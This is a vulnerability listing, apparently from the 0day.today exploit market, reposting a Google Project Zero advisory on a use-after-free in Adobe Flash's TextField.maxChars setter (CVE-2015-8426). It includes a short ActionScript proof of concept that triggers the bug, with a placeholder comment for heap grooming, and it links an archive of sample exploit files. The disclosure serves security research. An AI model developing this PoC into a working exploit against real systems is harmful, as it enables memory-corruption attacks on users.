[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Adobe Flash - textfield.maxChars Use-After-Free

Author
Google Security Research
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-25960
Category
dos / poc
Date add
01-04-2016
CVE
CVE-2015-8426
Platform
multiple
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=581
 
There is a use-after-free in the TextField.maxChars setter. If the maxChars the field is set to is an object with valueOf defined, the valueOf function can free the field's parent object, which is then used. A minimal PoC is as follows:
 
var times = 0;
var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.maxChars = {valueOf : func};
 
function func(){
 
        if (times == 0){
            times++;
            return 7;
        }
    mc.removeMovieClip();
 
        // Fix heap here
 
    return 7;
     
    }
 
A sample swf and fla are attached.
 
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39650.zip

#  0day.today [2024-12-27]  #